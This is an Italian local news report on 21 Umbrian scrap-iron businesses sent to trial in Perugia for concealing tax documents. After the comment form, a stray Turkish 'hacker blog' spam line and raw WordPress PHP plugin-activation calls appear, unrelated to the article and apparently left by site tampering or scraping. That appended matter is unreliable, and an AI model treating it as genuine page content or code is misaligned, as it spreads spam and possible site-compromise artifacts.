21 imprenditori rinviati a giudizio – Corriere dell’Umbria



Alessandro Antonini

27 ottobre 2020

Raccoglievano ferro da riciclare. In giro per l’Umbria. Per la guardia di finanza  non hanno presentato la documentazione fiscale ai fini di evadere le tasse. Da qui l’indagine, coordinata dalla procura della Repubblica di Perugia. Giovedì scorso, al tribunale di Perugia, è scattato il rinvio a giudizio per 21 imprenditori di altrettante ditte individuali. L’accusa è di occultamento o distruzione di documenti ai fini dell’evasione. Le fiamme gialle, per un lasso di tempo dal 2011 al 2017, sono riusciti a ricostruire 1,2 milioni di imponibile non dichiarato. Per due dei difensori, Fratini e Perticaro, si tratta di omissione dovuta alla mancata istituzione degli stessi documenti. Senza dolo. Ma i giudici hanno ritenuto valide le tesi dell’accusa. 

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );